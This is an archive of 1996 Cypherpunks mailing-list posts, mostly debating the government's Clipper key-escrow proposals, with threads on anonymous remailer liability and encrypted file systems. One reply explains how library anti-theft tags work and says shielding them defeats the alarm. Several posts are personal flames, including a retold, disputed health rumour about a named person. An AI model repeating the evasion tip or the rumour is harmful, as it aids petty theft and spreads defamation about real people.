On the Friday "Clipper III" rehash by the Admin:

Balancing Privacy and Official Eavesdropping

          By JOHN MARKOFF

          "The president and vice president took an oath to protect our
national security," Simon said. "They feel they have to err on the side of
protecting national security." 

          The government also said that it did not see an immediate
technical solution to the problems that would result from the global
proliferation of "strong cryptography." 

**************

Last time I looked, the oath they took was to protect the Constitution --
not the nation or national security.

I don't see an "immediate technical solution" to strong crypto either.  Or,
indeed, a long-term solution.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bill O'Hanlon" <wmo@rebma.rebma.mn.org>
Date: Mon, 15 Jul 1996 08:23:18 +0800
To: mix-l@jpunix.com
Subject: New mixmaster remailer announcment
Message-ID: <199607142027.PAA03058@rebma.rebma.mn.org>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 15 Jul 1996 11:30:40 +0800
To: David Sternlight <cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.27 - No New News on Crypto: Gore Restates
Message-ID: <199607142250.PAA18664@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:06 PM 7/14/96 -0700, David Sternlight wrote:
>At 2:37 PM -0700 7/14/96, jim bell wrote:
>>At 10:17 AM 7/14/96 -0700, David Sternlight wrote:

>>>Your best shot would be to make sure the part about the system being
>>>voluntary was hard-wired into any legislation or rule-making.
>>
>>Wrong.  Our "best shot" is to ensure that no "key escrow" legislation is
>>adopted, and moreover export restrictions on crypto are eliminated.
>
>Nope. That's some people's preferred shot, but may not be the best one 

Okay, "best" by which definition?

And don't avoid the question:  Am I not free to reject YOUR opinion of what 
the "best" solution is FOR ME?

>or even a realistic one. 

"Realistic"?  Who's definition?


>It's certainly a partisan political advocacy (in the
>sense that people are partisan about this issue, not in the sense of a
>particular political party).

Meaningless tripe.  All you're saying is that people disagree.  People 
disagree about a lot of things; that doesn't legitimize opposing opinions.


> Yet that attitude didn't get any legislation to stop Clipper I.

We didn't NEED "any legislation to stop Clipper I."  Quite the opposite, 
anyone promoting Clipper NEEDS legislation to force it on unwilling citizens.


>My point was very simple--if the government is going to say a system is
>voluntary, make them put it in writing in the rules or legislation.

Why have the "system" in the first place?  No legislation, no system.  Simple.

> We
>failed to do that with Clipper I (when they said in non-rulesmaking
>statements that they had no intention of making escrow mandatory--but
>nobody said "OK. Put it in writing as a formal policy.")

  No, you're misrepresenting the issue:  You're trying to subtly suggest 
that we should have agreed with MOST of the Clipper proposal AS LONG AS it 
was explicitly made voluntary.  (Yet nothing prevents Congress from writing and 
passing a law which prohibits the executive branch of government from making 
escrow mandatory; they haven't done this.)

Quite the contrary:  I don't trust the government to implement any such 
proposal EVEN IF it is, ostensibly, "voluntary."  The voluntary/involuntary 
aspect is an excellent reason to oppose Clipper, but is by no means the only 
one.  Also, I don't trust the government's definition (and dynamically 
changeable interpretation) of the word, "voluntary."    Since Clipper was 
funded with tax dollars stolen from the public its very existence is already 
a violation of the "voluntary" requirement.  The fact that Clipper was 
developed without substantial public (and I mean PUBLIC, not some selected 
committee of bootlickers) input and debate proves that the government knew 
it could get no support for the idea.

One of the recently revealing aspects of the government's dishonesty 
concerning Clipper was a clarification which stated that Clipper telephones 
could not communicate with any crypto telephone that didn't implement key 
escrow.  But as anyone who followed the Beta vs. VHS competition saw, the 
market generally abhors two mutually incompatible standards, particularly if 
a certain level of compatibility  is required or is at least desirable, and 
particularly if there is no good reason to maintain BOTH those standads.  
The main disadvantages to maintaining two tape formats was the inconvenience 
of sharing tapes with people who had the opposite format, the requirement 
that retail stores maintain two stocks, and the requirement that rental 
people support both formats.  There were no powerful incentives to maintain 
two standards, and thus one had to die.

 Crypto telephones, by definition, need to be far more compatible with each 
other than VCR machines.  They must actually talk to each other.   Imagine a 
world in which there were two different crypto formats, and for stupid 
political reasons they were entirely incompatible:  System "A" couldn't talk 
to system "B."  What would happen? 
 It's obvious:  One format would kill the other.  People wouldn't tolerate 
the compatibility.    The US Government wanted the surviving system to be 
Clipper, and to accomplish this they used stolen tax dollars to secretly 
develop a system that they hoped would nip the potential competing systems 
in the bud.  It didn't work, of course, but it is clear what they tried to 
do.   

If, on the other hand, there was no impediment to system "A" talking to 
system "B", both systems could easily co-exist.  A few suckers would buy 
Clipper phones; the rest of us would insist on good encryption.  Clipper 
would eventually die, just as Beta VCR's eventually did.  The government 
understands this, that's why they inserted the requirement for incompatibility.


>. As a result, many
>in government even at the higher policy-making levels are still calling for
>mandatory escrow. Had it been in the rules, it's less likely they could
>have overtly gone against a rules-making covenant/compromise.

Hmmmm...  I thought Congress made arming the Contras in Nicaragua explicitly 
illegal.  Yet Ollie North got away with it, effectively.  What is it that 
makes you so certain that Government has gotten any more honest in the past 
10 years?


>It's simple pragmatic regulatory politics. 

And that's exactly the problem!  That's because it's also wrong.  We don't 
need to be "pragmatic" by YOUR definition.

>It's how the system works,

Actually, in the past the system has "worked" by suckering in the public, in 
exactly the way you're attempting to do.  Tricking them into supporting 
things that were bad for them.  Remember the "Gulf of Tonkin Resolution"?

> and
>using the system itself to achieve one's goals is one of the more powerful
>techniques around. You don't have to like it, but you do have to decide
>whether you'd rather be "right" or get the result.

In a sense, we ALREADY have "the result," or at least a substantial fraction 
of it.  Development of domestic crypto is ostensibly free.  The only thing 
desired further in the elimination of any residual restrictions, WITHOUT 
letting the government set up any sort of key-escrow system, voluntary OR 
involuntary.

As far as I can see, cooperation at this point with the pro-GAK forces can 
only hurt the cause.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 15 Jul 1996 10:39:47 +0800
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: Markoff on Clipper III
Message-ID: <199607142258.PAA19029@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:33 PM 7/14/96 -0400, Duncan Frissell wrote:
>On the Friday "Clipper III" rehash by the Admin:
>
>Balancing Privacy and Official Eavesdropping
>
>          By JOHN MARKOFF
>
>          "The president and vice president took an oath to protect our
>national security," Simon said. "They feel they have to err on the side of
>protecting national security." 
>
>          The government also said that it did not see an immediate
>technical solution to the problems that would result from the global
>proliferation of "strong cryptography." 
>
>**************
>
>Last time I looked, the oath they took was to protect the Constitution --
>not the nation or national security.

It's called "mission creep."  And they didn't quite tell the truth:  Their 
main loyalty is to "government security" or even "job security."


>I don't see an "immediate technical solution" to strong crypto either.  Or,
>indeed, a long-term solution.

Thank heavens for that!
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Mon, 15 Jul 1996 09:45:09 +0800
To: cypherpunks@toad.com
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <Pine.LNX.3.91.960714094635.9973A-100000@user1.scranton.com>
Message-ID: <Pine.BSI.3.91.960714162205.17031A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 14 Jul 1996, Moroni wrote:

>      The reason that caller ID cannot be blocked to 800 and 900 numbers 
> is that it is used for billing purposes by the telephone company to the 
> person or business who owns that 900 or 800 number. 

    They would get your phone number and information on their bill 
regardless of whether they have ANI/CID/etc.  That comes from the phone 
company and not from their own systems.

> to keep records. They records as they stand now include the phone number 
> from which they were dialed and the length of the call. My phone call to 
> them from Scranton ,Pa will cost the L.L.Bean less then Tim Mays from 
> California because I am closer.

    Not necessarily.  I get charged a flat 13 cents a minute for all 
connects to my 800 number, regardless of where they are calling from.

>       What could concevably be done is that the software could be 
> reprogrammed to delete the phone number immediatley after the 
> computation. Or to have the computation done immediately and deltion to 
> accompany it. third, the phone company could reprogram it so the mileage 
> and time is computed somhow without the logging of the caller. All of 
> this has to do computer programming and I find none of the aforementioned 
> an impossibility to achieve.

    There is a big difference, and change in the way they could operate 
their records, between having instant access to your number when you call 
or having access to it when they receive the telco bill at the end of the 
month.
                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
     "Official estimates show that more than 120 countries have or are 
      developing [information warfare] capabilities." -GAO/AIMD-96-84
                         So, what is your excuse now?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Mon, 15 Jul 1996 12:56:35 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.27 - No New News on Crypto: Gore Restates
In-Reply-To: <199607142250.PAA18664@mail.pacifier.com>
Message-ID: <v03007600ae0f48c37cfc@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:48 PM -0700 7/14/96, jim bell wrote a typically argumentative message.
I've gotten wiser over time and don't plan to respond. I think both our
positions are quite clear and readers may make up their own minds.

This post is a courtesy to others who may have been expecting more. It's a
one-time statement to this list, which I've just joined, of my current
practice: Silence does not constitute assent.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Mon, 15 Jul 1996 16:26:56 +0800
To: cypherpunks@toad.com
Subject: Re: Dep. AG Gorelick on CSPAN2 advocating escrow
In-Reply-To: <ae0e969b01021004a5a1@[205.199.118.202]>
Message-ID: <v03007601ae0f4a7ce492@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3943.1071713593.multipart/signed"

--Boundary..3943.1071713593.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

At 12:20 PM -0700 7/14/96, Timothy C. May wrote:
>At 1:34 PM 7/13/96, Deranged Mutant wrote:
>>Saw Jamie(?) Gorelick, Dep. Attny Gen. on CSPAN2 talking about needs
>>for key escrow. Emphasized the what if people lose their keys, or
>>someone dies, or if an employee steals company secrets & encrypts
>>them... rather than the usual what if terrorists use crypto line
>>(though she did mention that too).
>>
>>Guess they're taking a new tack to sell it to the public.  A lot of
>>bunkum... (project left to the reader how these can be handled in a
>>non-GAK manner).
>
>And as we all know, having discussed this many times, even if one buys
>these arguments for the advantages of key escrow, THEY DO NOT APPLY TO
>COMMUNICATIONS!
>
>That is, imagine Alice and Bob communicating over some channel. Alice has
>files on her computer. Putatively, if she dies, leave her company,
>whatever, it is desired to reconstruct these files. Fine. A potential use
>for key escrow. (If voluntary, of course.)
>
>But what does this have to do with a channel between Alice and Bob? Why
>should the keys for this channel ever need to be escrowed for the reasons
>Gorelick cites? After all, Alice has the files she sent stored locally, and
>Bob presumably has the same files he received.
>
>There is essentially no rationale for escrowing the keys of a transient
>communication.
>
>The Administration and even cryptologists apologizing for GAK (who ought to
>know better) are curiously silent on this rebuttal to their claims.

It's not that powerful a rebuttal, since it would require files of e-mail
(or their session keys) to be encrypted twice--once with the escrowed
storage key and again with the transmission (recipient's) key. And if the
message were public key, it would require a re-encryption at the receiving
end with the recipient's escrowed storage key to make the recipient's files
available to HIS management. Further, it would require everyone to keep two
keys since I infer from your position you wouldn't want your public key to
be the escrowed one (for transmission security).

As you know I do not support mandatory key escrow in the US, but arguments
against it need to be robust. Your argument, while not without merit, is
weaker than one would like (in that it is susceptible to the mental
rebuttal by policymakers that I've outlined above). In my view it isn't the
kind of decisive argument that would justify your use of "curiously" silent.

David



--Boundary..3943.1071713593.multipart/signed
Content-Type: application/octet-stream; name="pgp00006.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00006.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0KVmVyc2lvbjogMi42LjMK
CmlRQ1ZBd1VBTWVtY0hVd2dIK05ZclE4MUFRRXNrUVA4REJiM3Vwd1VPT0d4
bVVib2QvUTgyNS9yUWw0WVY0TlIKRDJ0bG1PN3N2eTJlZU1zb1o4RTBDdU1S
VE5NN2p1ajd1YldOS3hHL3JVcXdMU3IrMWxGTzMxK2s4ZlVBZDgwbApiTnB3
cTBDb0lQTGNobkZrYmpmaGZYUmdtdjVnbVUxTnFNSHNZY0k3Zm9pK1hocUpY
OXduekI2eHhrWW44WHpUCm9GN0lyTTdYY1hNPQo9Um1xVwotLS0tLUVORCBQ
R1AgU0lHTkFUVVJFLS0tLS0K
--Boundary..3943.1071713593.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Bostick <abostick@netcom.com>
Date: Mon, 15 Jul 1996 13:30:35 +0800
To: cypherpunks@toad.com
Subject: Organized Crime Home Page - Four Horsemen, No Waiting
Message-ID: <31E99D38.75AC@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks interested in establishment scaremongering are invited
to take a look at the Organized Crime Home Page 
(http://www.alternatives.com/crime/index.html), sponsored by a group
called The Committee for a Safe Society, about the world-wide threat
of organized crime.  Apparently every evil known to post-Cold-War
society, even the bad weather in Chicago, is the responsibility of
organized crime.  Now you know why governments need GAK.

Alan-Bob says check it out.
-- 
Alan Bostick               | [Spielberg's] latest is TWISTER, a film that
mailto:abostick@netcom.com | gives whole new meaning to the phrase "giant
news:alt.grelb             | sucking sound."  -- Patrick Taggart
http://www.alumni.caltech.edu/~abostick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Mon, 15 Jul 1996 04:30:04 +0800
To: cypherpunks@toad.com
Subject: Re: Stuffs used for detection
Message-ID: <1.5.4.32.19960714164618.008c35ac@193.246.3.200>
MIME-Version: 1.0
Content-Type: text/plain


At 09:52 PM 7/12/96 +0800, you wrote:
>In our school library, there is a depository area wherein you deposit your
things and get the tag. Since the library doesn't allow those tags to be
brought out from the library, everytime you brought it out and pass by the
door, it will alarm. Does anyone know what stuff is that? How come it is
alarmed? I brought some metals but it wouldn't alarm... Why those tag would
alarm them???
>

Most of these systems are made of an oszillator (basically a few windings of
a wire with a capacitor:

 ------
/      \
¦--¦¦--¦
\      /
 ------

This acts like an ordinary RLC-Oszillator. When you put it in a electrical
field with the right frequency, it will effect the field strong enough to be
detectable.

So, if you shield it, you win.
----------< fate favors the prepared mind >----------
Remo Pini                      Fon 1: +41 1 350 28 82
mailto:rp@rpini.com            Fon 2: +41 1 465 31 90
http://www.rpini.com/remopini/ Fax:   +41 1 350 28 84
--------< words are what reality is made of >--------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 15 Jul 1996 06:17:18 +0800
To: cypherpunks@toad.com
Subject: setting up disposable remailers
Message-ID: <199607141828.TAA00441@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Some thoughts on solutions to the remailer operator liability problem.

It occurs to me that the risk for the remailer owner could be reduced
by separating concerns.  That is, introducing separate roles for
setting up the remailer so that the identity of as many parties as
possible is not determinable to the litigator.

Model 1
-------

Separable roles:

- person owning the remailer
- person installing remailer software
- person handling complaints to the remailer

In this model a new remailer owner would anonymously email a member of
the cypherpunks list asking if they would be interested in installing
a remailer in the owners provided account.

The remailer owner would anonymously open an account with an ISP
offering anonymous shell accounts, and accepting digicash, or cash,
and anonymously email the account details to the installer.

Optionally, a third party (the maintainer) could be persuaded to
accept complaints for the remailer, and (anonymously) send signed
instructions to the remailer to bar certain receiving addresses.

The only determinable target for a typical litigator would be the ISP.
If a more powerful adversary were the litigator, such as a TLA anxious
to demonstrate an excuse for it's continued existance, it is possible
they may retrieve the identity of the installer (if they do indeed
have taps and large IP traffic recording facilities for instance).
They may try to hold the installer responsible if unable to find the
owner.  Model 2 goes some way to reducing risk for the installer.

Model 2
-------

In this model the additional separable role of setting up a shell
command mail processor on the account is introduced.  What I mean by
this is as has been discussed on the list recently, that a mail
handler which executes signed shell commands emailed, and anonymously
emails back the command output.

That is to say the remailer owner now passes the account information
to the installer of the mail processor.  The shell installer sets up
the command processor, and leaves.

Now the owner gives the PGP secret key of the command processor to the
remailer installer (or if the owner feels competent, does this part
themselves).

Provided that the anonymous remailers used for all of the steps are
type2 mixmaster remailers, the system should be much more secure.

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 15 Jul 1996 14:05:55 +0800
To: "Mark C. Henderson" <mch@squirrel.com>
Subject: Re: Encrypted file systems
In-Reply-To: <9607141307.TE28806@squirrel.com>
Message-ID: <Pine.LNX.3.93.960714195300.2891A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 14 Jul 1996, Mark C. Henderson wrote:

> On Jul 14, 12:48, Adam Back wrote:
> > Subject: Encrypted file systems
> > - Encrypted file system located in a file in another file system 
> >   (much like DOS stacker drives) this is an ease of use criteria -- I
> >   suspect re-partitioning drives would put off many potential users.
> There are a couple of advantages to this sort of approach (i.e. 
> having the encrypted filesystem live in file(s) on an ordinary 
> filesystem) other than ease of use. 
> 1. Backups are easy. One can use whatever backup software one normally
> uses.
> 2. The encrypted filesystem can actually live on a remote file server 
> with data being encrypted/decrypted on the fly on the local host. (of 
> course, you have to consider the security risks that you get from 
> being on a network). 

     An interesting thought:

     One of the things that the entertainment electronics industry is pushing
is the "Set Top Box" that attaches to your idiotbox and allows you to 
use the internet over either a POTS line, cable modem or whathave you. Problem
is, there is no local hard drive. No way to store sensative data (even a hot
list). With the encrypted filesystem stored on a remote machine, and using 
something like SSH written in a Java like language (NOTE: Of necessity MUCH 
more secure) to "Mount" the SFS over the network... 

     Something like this could make the author a decent amount of money. Makes 
me wish I were a coderpunk.` 
 
Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 15 Jul 1996 16:07:29 +0800
To: cypherpunks@toad.com
Subject: How I Would Ban Strong Crypto in the U.S.
Message-ID: <ae0efb9f020210046227@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:18 AM 7/15/96, Dave Banisar wrote:
>Its now up at http://www.epic.org/crypto/key_escrow/wh_cke_796.html
>

Thanks. I took an initial look, and it looks like the same old stuff.

The report speaks of an "emerging consensus" (for key escrow). I see just
the opposite, unless the report is speaking only of the U.S. intelligence
and law enforcement community and its foreign counterparts. Business has
made it clear (cf. the several recent reports) that it is opposed to the
Administration's plan, and that if a market for some form of key escrow
exists (as it certainly does, in specific contexts), that the market can
supply the solution.

And certainly the civil liberties groups and groups such as ourselves are
not part of this "emerging consensus." Ditto for the "average man in the
street," as evidenced by opinion polls (I recall 80% opposition reported by
one of the newsweeklies, but don't quote me), by anecdotal reports (e.g.,
Zimmermann's tale of his discussions), and by opposition to Clipper I,
Clipper II, and now Clipper III.

A bunch of Congressmen, including the axis supporting the Burns bill,
obviously are not part of this emerging consensus.

The National Research Council report made it clear that a distinguished
panel of cryptographers, computer scientists, and policy professionals did
not think key escrow is desirable.

And the hundreds of folks in attendance at recent SAFE and NRC travelling
roadshows were obviously not in support of key escrow.

Business, civil liberties groups, professional organizations, and most Net
people are opposed to the Administration's key ecrow proposals (such as
they are understood to be, in Clipper I/II/III).

So, who is in this "emerging consensus"?

Moving on to the wisdom of imposing a government solution to what either is
or is not a market need, there is great danger in deploying even a
nominally (at this time) "voluntary standard." This is a danger many of us
have felt for years to be the main danger of nominally (and ostensibly)
"voluntary" systems.

Imagine a voluntary system supported and funded by the government, using
its power to limit exports and to "jawbone" foreign governments. (No time
here to examine the obvious issues--cf. the archives for many explications
over the past several years.)

Once widely deployed, and perhaps mandatory in countries like France,
Singapore, Iraq, and the like, it would take very little more to simply
pass a law restricting the non-escrowed alternative in the U.S.

(Sure, such a law might be unconstitutional, for the reasons we so often
discuss. Sure, there are many circumventions possible. Sure. The point is
not to rehash these points again but to indicate why Cypherpunks and civil
libertarians should NOT support any plan, even a "voluntary" plan, that
puts such power to set standards in the hands of the government. Even a
"signed promise" is not enough, given the dangers of "flipping a switch.")

Is this a plausible scenario, though? Well, were I in the LEA/TLA
community, this is what my fallback plan would probably be. Realizing that
a full-frontal ban on strong crypto, or crypto without backdoors, would not
fly at this time (unless Oklahoma II happens, in which case all bets are
off), and realizing that the plans for Clippers I, II, and III have been
fizzling, I would push for a relatively harmless-sounding "voluntary key
escrow" plan.

I would push hard on Netscape, Microsoft, Novell, Sun, Apple, and the other
companies (but mainly on Netscape and MS, for obvious reasons) to bundle in
"trusted third parties" and all that GAK stuff. Bundle it in, make it easy
to use, make it easy to export, make it easy to spread in crypto-hostile
countries, and hope like hell that it undermines the push for PGP and
S/MIME.

I would work closely with Mossad, GCHQ, SDECE, Chobetsu, Savak, and all the
other secret policemen of the world to make sure that while America might
remain an "island of strong crypto" for a while at least, that the same
could not be said of other countries. That is, I would work to help them
limit crypto use in their own countries to GAK-only forms.

(Those pesky survivalists, militia members, and ACLU folks in America could
keep using their Bass-o-matic and PGP  tools, but most of the rest of the
world would be mostly limited to GAK and New World Order software.)

Then, in about 2002 or so, depending on how many more serious terrorist
incidents have occurred, I would drop the hammer on strong crypto. Maybe an
Executive Order, maybe a state of national emergency, maybe a liberal
interpretation of the commerce clause, maybe an Act of Congress....

Once a New World Order-approved GAK system is widely deployed, outlawing of
"rogue cryptography" in the U.S. is more manageable.

That's what I would do.

(But not being on that side of the ideological fence, I will instead fight
GAK as I always have. And I will not be fooled by talk of how "Americans
will always be free any form of cryptography." Not when those same reports
from the Administration, and the testimony of Louis Freeh, etc., is in the
same breath taling about the need to stop pornographers from encrypting
their files, and so forth. Do they think we're stupid?)

Don't be fooled.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Banisar <tc@mindvox.com>
Date: Mon, 15 Jul 1996 12:28:32 +0800
To: cypherpunks@toad.com
Subject: Clipper III.2 paper URL
Message-ID: <Pine.SOL.3.91.960714201812.5148A-100000@phantom>
MIME-Version: 1.0
Content-Type: text/plain



Its now up at http://www.epic.org/crypto/key_escrow/wh_cke_796.html

-d





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 15 Jul 1996 13:22:00 +0800
To: cypherpunks@toad.com
Subject: Re: My impending death
In-Reply-To: <2.2.32.19960714203307.006d90c4@mail.aracnet.com>
Message-ID: <y9Z3qD140w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


> Since Vulis decided to drag in a disagreement from elsewhere, I have a brief
> invitation.

The cripple is lying again, as usual.  Twice he reposted to cypherpunks
his Usenet lies with no cryptographic relevance just to slime me. Since
not even Perry told the demented cripple to quit, I'll respond in kind.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Mon, 15 Jul 1996 16:01:23 +0800
To: cypherpunks@toad.com
Subject: HotWired -- "Crypto Storm Warning"
Message-ID: <Pine.3.89.9607142012.A23309-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Sun, 14 Jul 1996 20:19:33 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: fight-censorship+@andrew.cmu.edu
Subject: HotWired -- "Crypto Storm Warning"

>From Monday's The Netizen on HotWired. Read the full text at the URL 
below. Gorelick spoke last Friday at the Freedom Forum in Virginia.

-Declan

---

http://www.netizen.com/netizen/96/29/campaign_dispatch0a.html

HotWired
The Netizen

"Crypto Storm Warning"
Campaign Dispatch

by Declan McCullagh (declan@well.com)
Washington, DC, 14 July 
   

   The Clinton administration escalated its cyber-fearstorm today when
   a top Justice Department lawyer slammed the Net for "transmitting
   child pornography into our homes" and for allowing hackers to possibly
   "shut down the banking system."

[...]
 
   At the same time, [Jamie] Gorelick edged away from the hard-line
   rhetoric the administration used to defend the Communications
   Decency Act.

[...]

   Gorelick's cybercondemnations play against a backdrop of political
   jockeying inside the Justice Department. Reno disclosed last November
   that she has Parkinson's disease, and Gorelick is her logical
   successor if Clinton stays in office next term.

[...]

   After Gorelick completed her speech and sat down, I leaned over and
   asked her: "Could I have your email address?"
   
   She didn't know it. "I don't go into it that often," Gorelick said,
   adding that the Justice Department doesn't use email much, for
   "security reasons." "Call me and I'll give it to you," she promised.
   
   Gosh, what a surprise: The US government's leading spokesperson on the
   dangers and the evils of the Net doesn't even log in.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 15 Jul 1996 16:27:59 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE, FLAME] Cypherpunk kook slanders
Message-ID: <2.2.32.19960715042208.00ad81b4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:23 PM 7/14/96 EDT, Dr.Dimitri Vulis KOTM wrote:

[Alot of bullshit deleted]

>I remember how someone recently argued on news.groups that Bruce Bough's votes
>should be invalidated because he's dying from AIDS. I strongly disagree with
>Dan's (?) reasoning, which was, I recall, that someone with only a couple of
>months left to live shouldn't be telling others how to run Usenet after his
>death. I think we should consider Bruce's opinions as being representative.
>After all, a Usenet vote is an interest poll, and the voters are just a sample
>of a larger population. Not everyone who thinks like Bruce Bough is going to
>die together with him from AIDS within a few months (sigh). Let him vote.

I have no idea where you got the idea that Bruce has AIDS.

I know Bruce well.  He does not have AIDS.  You have no clue as to what the
hell you are talking about.

I understand him being pissed at the accusation.  This society does not deal
very well with people with AIDS.  Bruce has a justifiable concern as to
lasting damage to his reputation due to unfounded allegations.  (Of course,
it is not as bad as accusing someone of being a child mollester, as your
friend Dr. Grubor enjoys doing to people he disagrees with...)

Bruce *does* have health problems.  He has worked DAMN hard to overcome
them. They are not a figment of his imagination, nor are they the result of
AIDS.  They are a very real problem which he is trying to deal with in the
best way he can.

As for him "dragging outside articles into this group"...  You must mean him
mentioning your recieval of the "Net Kook of the Month Award".  It probably
was off topic.  After reading your forwards however, it was not undeserved.

Another thing that you need to do is learn how to comprehend written english.

You stated:
>In article 2, Bruce Bough follows up on my article and threatens to prosecute
>me under the Americans with Disability Act for misspelling his name.

He did nothing of the sort.  He threatened to prosecute you for slandering
him (by stating he has AIDS when he does not), not for the spelling of his name.

He stated:
>Further, you might want to read up on the Americans With Disabilities
>Act. Slanderous and defamatory statements about the handicapped - and my
>government agrees that I do have a real problem, though it's not AIDS -
>open you up to interesting liability.

I don't understand why you feel the need to cast aspersions on those you
disagree with.  But you should not be surprised when it pisses people off.

Bruce is a very nice guy who has some health problems.  I know few people
who have met him who have not gotten along with him.  Why I should take the
word of someone with your attitude over his is unclear to me.  Acting like
an asshole does not gain any sympathy for your cause.

Bruce has killfiled you.  I do not blame him.  You remade my killfile list
as well.

Get a life.



---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Mon, 15 Jul 1996 16:48:12 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: Markoff on Clipper III
In-Reply-To: <199607142258.PAA19029@mail.pacifier.com>
Message-ID: <v03007600ae0f78a7bd80@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3943.1071713593.multipart/signed"

--Boundary..3943.1071713593.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

At 4:57 PM -0700 7/14/96, jim bell wrote:
>At 02:33 PM 7/14/96 -0400, Duncan Frissell wrote:
>>On the Friday "Clipper III" rehash by the Admin:
>>
>>Balancing Privacy and Official Eavesdropping
>>
>>          By JOHN MARKOFF
>>
>>          "The president and vice president took an oath to protect our
>>national security," Simon said. "They feel they have to err on the side of
>>protecting national security."
>>
>>          The government also said that it did not see an immediate
>>technical solution to the problems that would result from the global
>>proliferation of "strong cryptography."
>>
>>**************
>>
>>Last time I looked, the oath they took was to protect the Constitution --
>>not the nation or national security.

Did you miss the part in the Constitution about "provide for the common
defence" and about the President's associated responsibility to "take care
that the laws be faithfully executed"?

And what oath do you suppose binds him because "The President shall be
commander in chief of the army and navy of the United States"?

David



--Boundary..3943.1071713593.multipart/signed
Content-Type: application/octet-stream; name="pgp00007.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00007.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0KVmVyc2lvbjogMi42LjMK
CmlRQ1ZBd1VBTWVuS2kwd2dIK05ZclE4MUFRRXltQVA5RVNYU2NoWUpaRnBr
TkJsMEluTnJBcXFxNmlydC9JeVQKaVM4bnFPZit0R2l5KzVRME5mQXpNL3Z2
